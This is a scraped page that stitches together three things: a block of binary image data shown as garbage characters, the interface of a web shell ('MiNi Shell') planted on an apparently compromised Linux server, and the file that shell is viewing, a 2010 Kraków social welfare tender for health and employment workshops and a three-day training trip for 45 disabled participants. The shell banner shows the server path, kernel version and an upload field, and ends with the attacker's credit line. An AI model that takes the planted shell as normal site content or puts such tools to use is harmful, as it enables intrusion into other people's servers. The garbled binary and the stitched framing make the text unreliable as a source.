JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101123/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101123/379782-N-2010.html

<p class="kh_header"><b>Kraków: Zorganizowanie warsztatów stacjonarnych i wyjazdu szkoleniowego z zakresu edukacji i promocji zdrowia z uwzględnieniem rynku pracy dla osób niepełnosprawnych dla uczestników projektu Pora na aktywność</b><br>
<b>Numer ogłoszenia: 379782 - 2010; data zamieszczenia: 23.11.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej w Krakowie , ul. Józefińska 14/002, 30-529 Kraków, woj. małopolskie, tel. 012 6165420, 6165424, faks 012 6165428.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mops.krakow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie warsztatów stacjonarnych i wyjazdu szkoleniowego z zakresu edukacji i promocji zdrowia z uwzględnieniem rynku pracy dla osób niepełnosprawnych dla uczestników projektu Pora na aktywność.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zorganizowanie warsztatów stacjonarnych i wyjazdu szkoleniowego z zakresu edukacji i promocji zdrowia z uwzględnieniem rynku pracy dla osób niepełnosprawnych dla uczestników projektu Pora na aktywność, zgodnie z poniższymi wytycznymi: 1.	Ilość uczestników: 45 beneficjentów projektu Pora na aktywność (osoby niepełnosprawne)
2.   Zorganizowanie i przeprowadzenie warsztatów stacjonarnych 
1) warsztaty dla beneficjentów odbywają się w 3 grupach
a) 3 godziny z zakresu kompetencji i umiejętności społecznych dla każdej grupy
b) 3 godziny z zakresu edukacji i promocji zdrowia dla każdej grupy
c) 3 godziny z doradcą zawodowym dla osób niepełnosprawnych dla każdej grupy
2) tematyka warsztatów: a)	warsztaty z zakresu kompetencji i umiejętności społecznych: -  psycholog przedstawi beneficjentom metody działania i techniki radzenia sobie w sytuacjach trudnych i stresujących, np.: sposoby przeciwdziałania tremie związanej z wystąpieniami publicznymi na przykładzie rozmów kwalifikacyjnych, organizacja dnia codziennego po podjęciu pracy zawodowej, techniki automotywacji i relaksacji, ponadto przekaże wiedzę z zakresu wypracowania postaw asertywnych oraz miejscu i wartości pracy w życiu człowieka i konsekwencji psychicznych oraz społecznych braku pracy
b)   warsztaty z zakresu edukacji i promocji zdrowia: -  lekarz z medycyny pracy udzieli szerokich porad w ramach swoich kompetencji, jaki wpływ na kondycję psycho-fizyczną ma systematyczne leczenie, jak również przeprowadzą zajęcia zmieniające przekonanie, iż niepełnosprawność wyklucza aktywność zawodową. Ponadto zapewni odpowiednie publikacje w powyższych tematach 
c)   warsztaty z doradcą zawodowym dla osób niepełnosprawnych 	- doradca zawodowy dokona analizy uczestników pod kątem określenia predyspozycji zawodowych każdej osoby, zaktywizuje do poszukiwania pracy, przygotowania i reprezentowania swojej osoby przed pracodawcą, jak również każdy z uczestników otrzyma wzór CV. W ramach usługi doradca zawodowy ma opracować wytyczne dotyczące dalszej pracy pracownika socjalnego z każdym beneficjentem
3)  miejsce realizacji warsztatów: na terenie Gminy Miejskiej Kraków w miejscu wskazanym przez Wykonawcę 4)  termin realizacji warsztatów: a)  warsztaty z zakresu kompetencji i umiejętności społecznych oraz z zakresu edukacji i promocji zdrowia: od dnia podpisania umowy do 14 grudnia 2010 r. b)  warsztaty z doradcą  zawodowym dla osób niepełnosprawnych: styczeń-luty 2011 r. 3. Porady indywidualne z doradcą zawodowym dla osób niepełnosprawnych 1) udzielanie porad indywidualnych przez doradcę zawodowego z zakresu zatrudnienia osoby niepełnosprawnej, ograniczeń i możliwości na rynku pracy dla danej osoby niepełnosprawnej 2) wymiar czasowy porad: 1 godzina na każdego beneficjenta (45 beneficjentów x 1 godzina) 3) miejsce realizacji: na terenie Gminy Miejskiej Kraków w miejscu wskazanym przez Wykonawcę 4) termin realizacji: styczeń-luty 2011 r.
4. Zorganizowanie trzydniowego wyjazdu w ośrodku szkoleniowo - wypoczynkowym (uzdrowiskowym) celem zapoznania się beneficjentów w zakresie edukacji i promocji zdrowia oraz rozwiązywania problemów zdrowotnych, dbania o utrzymanie stanu zdrowia na optymalnym poziomie, podniesienia poziomu wiedzy o sposobach zapobiegania chorobom, uświadomienie posiadania kontroli stanu zdrowia
1) w trakcie pobytu odbędzie się 48 godzin zajęć (zajęcia w trzech grupach po 16 godzin dla każdej z grup dla 45 beneficjentów) umożliwiających podniesienie kompetencji zdrowotnych i zawodowych przydatnych do powrotu na rynek pracy osób niepełnosprawnych 2) zakres tematyczny zajęć: a)	podwyższenie sprawności fizycznej beneficjentów. Zajęcia poprowadzi rehabilitant pokazując proste ćwiczenia usprawniające fizycznie dla różnych typów niepełnopsrawności, wyjaśniając wpływ samopoczucia fizycznego na funkcjonowanie społeczne i zawodowe, pokazując ćwiczenia, które można wykonywać z udziałem innej osoby. 1 godzina zajęć praktycznych na Sali gimnastycznej lub w basenie
b) przeciwdziałanie negatywnym skutkom stresu w życiu codziennym i zawodowym. Prawidłowe żywienie jako sposób na utrzymanie dobrego zdrowia i kondycji. Kompensacja ograniczeń fizycznych na potrzeby aktywności zawodowej. Profilaktyka zdrowia w życiu codziennym i zawodowym. Zajęcia z lekarzem rodzinnym, dietetykiem i kardiologiem 3) termin realizacji usługi: w okresie od 15 do 17 grudnia 2010 r. 4) miejsce realizacji usługi: miejscowość, w której znajdują się ośrodki szkoleniowo-wypoczynkowe (uzdrowiskowe) oddalone od Krakowa nie więcej niż 150 km 5) na zajęciach wyjazdowych Zamawiającego będą reprezentowali pracownicy w ilości 3 osób, których zadaniem będzie wizytowanie przebiegu wyjazdu i pobytu uczestników (zwanych wizytatorami). Koszt pobytu wizytatorów Wykonawca jest zobowiązany uwzględnić w cenach jednostkowych uczestników wyjazdu. Zadaniem wizytatorów nie będzie tylko obserwacja i kontrola nad prawidłowym przebiegiem wyjazdu szkoleniowego, a także czynne wspieranie - pomoc beneficjentom 6)  transport: Wykonawca zapewni uczestnikom transport z Krakowa z Placu Bohaterów Getta do ośrodka szkoleniowo-wypoczynkowego (uzdrowiskowego) i z powrotem, zgodnie z obowiązującymi przepisami dotyczącymi przewozu osób. Autokar ma posiadać klimatyzację lub możliwość otwierania okien. Wyjazd z Krakowa w godzinach uzgodnionych z Zamawiającym (umożliwiający dojazd do miejsca pobytu przed godziną 10.00 celem spożycia śniadania), wyjazd z ośrodka w godzinach popołudniowych. Wykonawca zapewnia sprawdzenie stanu technicznego autokaru przez policję w dniu wyjazdu, a kierowca musi uzyskać protokół dopuszczenia pojazdu i kierowcy do przewozu osób. Przewoźnik powinien posiadać wymagane przepisami dokumenty m.in. licencję przewoźnika oraz zobowiązać się do podstawienia autokaru sprawnego technicznie, posiadającego pełną dokumentację gwarantującą jego przejazd na trasie określonej w umowie zgodnie z przepisami obowiązującymi w Polsce, a także posiadać odpowiednie ubezpieczenie, oraz do dbania o czystość autokaru podczas podróży (zewnątrz jak i wewnątrz). 7)   zakwaterowanie: Wykonawca zapewnia dwa noclegi dla 45 beneficjentów oraz 3 wizytatorów tj. 48 osób w pokojach dwu-trzyosobowych z łazienkami i WC lub jedna łazienka maksymalnie na dwa pokoje. Pokoje powinny być wyposażone w niezbędny sprzęt (pościel + ręczniki, szafki przynależne do jednego łóżka lub minimum 1 półka w szafie na uczestnika). Pomieszczenia powinny być wyposażone w sprawne urządzenia grzewcze. Trzy sale wykładowe na min 20 osób jedna do prowadzenia zajęć grupowych - wyposażone z dobrym nagłośnieniem i oświetleniem , w sprzęt DVD rzutnik, flipczart z  papierem i zestawem pisaków. Dostęp do kompleksu relaksacyjno- zdrowotnego (w tym kryty basen, sala gimnastyczna do ćwiczeń indywidualnych i ćwiczeń grupowych wyposażona w maty - materace na terenie obiektu lub w odległości max 100 m od tegoż budynku dostępna w okresie pobytu beneficjentów.  8) ubezpieczenie: Uczestnicy wyjazdu muszą zostać ubezpieczeni od następstw nieszczęśliwych wypadków w trakcie przejazdów oraz w trakcie trwania wyjazdu oraz kosztów leczenia na kwotę nie mniejszą niż 10 000,00 PLN na każdego uczestnika. Wykonawca zobowiąże się do przedłożenia Zamawiającemu polisy - umowy ubezpieczenia uczestników wyjazdu nie później niż 48 godzin przed terminem wyjazdu. 9) opieka medyczna : Wykonawca zapewnia opiekę medyczną w razie konieczności dla uczestnika pobytu w ramach Narodowego Funduszu Zdrowia.  10) wyżywienie: Wykonawca zapewni minimum 3 posiłki dziennie (śniadanie, dwudaniowy obiad z deserem, kolacja) oraz nieograniczony dostęp do napojów (kawa, herbata, sok, woda mineralna i ciastka) w ramach przerw miedzy zajęciami zgodnie z normami żywieniowymi zalecanymi przez Instytut Żywienia i Żywności.
Menu-wyżywienie na 1 osobę:
Dzień I
 Śniadanie: herbata lub kawa z mlekiem 200 ml, cukier 10g, sok owocowy bez cukru 100 ml, jogurt owocowy 150g, musli 50g, płatki śniadaniowe 50g, mleko 300 ml, miód 5 g, dżem 10g, ser żółty 2 rodzaje (łagodny i wędzony) 50g łącznie, masło 5g, pomidor i ogórek świeży 75g łącznie, pieczywo (w tym pieczywo ciemne, bułki) 150g, polędwica sopocka 50g, twarożek śmietankowy 75g, jabłko lub banan min. 100g
Obiad: barszcz z ziemniakami 400 ml, surówka z pomidora, cebuli i śmietany 150g, filet z kurczaka pieczony 300g (opcjonalnie dla wegetarian faszerowana papryka (farsz z ryżu, warzyw i sera) 400g, ziemniaki z wody 150g, kompot 200 ml, deser: winogrona 100g, gruszki 100g.  
Kolacja: szaszłyki (drobiowe  z kurczaka/indyka i wegetariańskie, każdy z co najmniej 3 składników, w mięsnych mięso ma stanowić min. 50% wagi szaszłyka) 400g, pieczywo 150g (w tym ciemne, bułki), herbata 400 ml, cukier 10g, pieczone ziemniaki 200g, keczup 5g, musztarda 5g, ogórek kiszony (30g).
Dzień II
Śniadanie: herbata 200 ml, cukier 10g, sok owocowy bez cukru 100 ml, jogurt owocowy 150g, muesli 50g, płatki śniadaniowe 50g, mleko 300 ml, miód 5 g, dżem 10g, ser żółty 2 rodzaje (łagodny i wędzony) 50g łącznie, masło 5g, pomidor i ogórek 75g łącznie, pieczywo (w tym pieczywo ciemne, bułki) 150g, polędwica sopocka 50g, twarożek śmietankowy 75g, jabłko lub banan min. 100g.
Obiad: zupa pomidorowa z ryżem 400ml, placki ziemniaczane (400g), sos pieczarkowy 150g, sos z mięsa i papryki 100g (mięso min. 50% wagi sosu), kompot 200 ml, deser: szarlotka 150g, pomarańcza 1 sztuka.
Kolacja: zapiekanka z ziemniaków, brokułów i sera w sosie beszamelowym (400 g), pieczywo 75g (w tym ciemne, bułki), herbata 400 ml, cukier 10g, szaszłyki owocowe (min 3 owoce w tym min. 1 świeży, pozostałe mogą być konserwowe) 150 g.
Dzień III
Śniadanie: herbata 200 ml, cukier 10g, sok owocowy bez cukru 100 ml, jogurt owocowy 150g, muesli 50g, płatki śniadaniowe 50g, mleko 300 ml, miód 5 g, dżem 10g, ser żółty 2 rodzaje (łagodny i wędzony) 50g łącznie, masło 5g, pomidor i ogórek 75g łącznie, pieczywo (w tym pieczywo ciemne, bułki) 150g, polędwica sopocka 50g, twarożek śmietankowy 75g, jabłko lub banan min. 100g.
Obiad: zupa fasolowa 400 ml, ryż 150g, ryba (mintaj lub morszczuk) 300g, gotowane warzywa (marchew, fasolka szparagowa, kalafior, brokuł, papryka) 200g, kompot 200ml, banany pieczone z czekoladą 150g, mandarynki 3 sztuki.
5.  Podczas realizacji Zamówienia Wykonawca zobowiązany jest do:
1) prowadzenia dziennika każdych zajęć zawierającego listę obecności, wymiar godzin i tematy zajęć,  2)  dostarczenia materiałów  dydaktycznych i publikacji z zakresu edukacji i promocji zdrowia dostosowanych do potrzeb grupy uczestników(łącznie nie mniej niż 16 stron tekstu z ilustracjami) 3) zapewnienia materiałów szkoleniowych dla każdego uczestnika w postaci:
- długopis metalowy typu zenit,
- teczkę tekturową lakierowaną zamykaną
- zeszyt 32 kartkowy,
- identyfikator
 4) oznaczenia dokumentów wytworzonych w związku z realizacją zadania, materiałów, sal w których odbywać się będą zajęcia itp. zgodnie z wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki  5) wydania po zakończeniu realizacji usługi zaświadczeń oznakowanych zgodnie z wytycznymi POKL, 6) prowadzenia dokumentacji fotograficznej usługi, 
7) zachowania w tajemnicy wszelkich danych osobowych, do których uzyskał dostęp w związku z wykonywaniem zadania oraz przestrzegania innych postanowień ustawy o ochronie danych osobowych ( DZ. U z 2002r. Nr 101, poz.926 z póź.zm.) 8) realizowania zajęć przez wyspecjalizowaną kadrę z zakresu psychologii społecznej, medycyny pracy, zdrowego stylu życia i żywienia - dietetyk oraz kardiologa, lekarza rodzinnego,  rehabilitanta i doradcę zawodowego
9) zapewnienia dostępu do napojów (kawa, herbata, sok, woda mineralna) oraz ciastek w ramach przerw między zajęciami stacjonarnymi odbywającymi się w Krakowie 6.  Wykonawca może zostać skontrolowany w zakresie przedmiotu zamówienia przez Zamawiającego lub podmiot kontrolujący Zamawiającego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający może udzielić Wykonawcy zamówień uzupełniających w trybie zamówienia z wolnej ręki w okresie 3 lat od udzielenia zamówienia podstawowego, stanowiących nie więcej niż 50 % wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówienia</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.02.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi posiadać wpis do Rejestru Organizatorów Turystyki i Pośredników Turystycznych</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a) osoby, które będą uczestniczyć w wykonywaniu zamówienia w zakresie kompetencji i umiejętności społecznej, posiadają wykształcenie wyższe psychologiczne, b)	osoby, które będą uczestniczyć w wykonywaniu zamówienia w zakresie edukacji i promocji zdrowia, posiadają wykształcenie wyższe lekarskie o specjalności: medycyna pracy, wykształcenie wyższe lekarskie o specjalności: kardiologia, wykształcenie wyższe na kierunku: fizjoterapia, o specjalności rehabilitacja ruchowa, wykształcenie wyższe na kierunku dietetyka, wykształcenie wyższe lekarskie o specjalności: medycyna rodzinna lub choroby wewnętrzne
c) osoby, które będą uczestniczyć w wykonywaniu zamówienia w zakresie doradztwa zawodowego, posiadają wykształcenie wyższe oraz licencję doradcy zawodowego d)	osoby o których mowa w pkt a), b) i c) posiadają minimum 1800 godzin doświadczenia zawodowego, w swoim zawodzie, w ostatnich 3 latach</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a) osoby, które będą uczestniczyć w wykonywaniu zamówienia w zakresie kompetencji i umiejętności społecznej, posiadają wykształcenie wyższe psychologiczne, b)	osoby, które będą uczestniczyć w wykonywaniu zamówienia w zakresie edukacji i promocji zdrowia, posiadają wykształcenie wyższe lekarskie o specjalności: medycyna pracy, wykształcenie wyższe lekarskie o specjalności: kardiologia, wykształcenie wyższe na kierunku: fizjoterapia, o specjalności rehabilitacja ruchowa, wykształcenie wyższe na kierunku dietetyka, wykształcenie wyższe lekarskie o specjalności: medycyna rodzinna lub choroby wewnętrzne
c) osoby, które będą uczestniczyć w wykonywaniu zamówienia w zakresie doradztwa zawodowego, posiadają wykształcenie wyższe oraz licencję doradcy zawodowego d) osoby o których mowa w pkt a), b) i c) posiadają minimum 1800 godzin doświadczenia zawodowego, w swoim zawodzie, w ostatnich 3 latach</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>wpis do Rejestru Organizatorów Turystyki i Pośredników Turystycznych</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawaijący  dopuszcza zmiany treści niniejszej umowy w zakresie 1) terminu realizacji zamówienia, 2) warunków płatności, 3) miejsca realizacji zamówienia</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.bip.krakow.pl/?dok_id=27000<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> MOPS w Krakowie, ul. Józefińska 14, pok. 002.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.12.2010 godzina 08:30, miejsce: Dziennik podawczy MOPS w Krakowie, ul. Józefińska 14.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Pora na aktywność.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com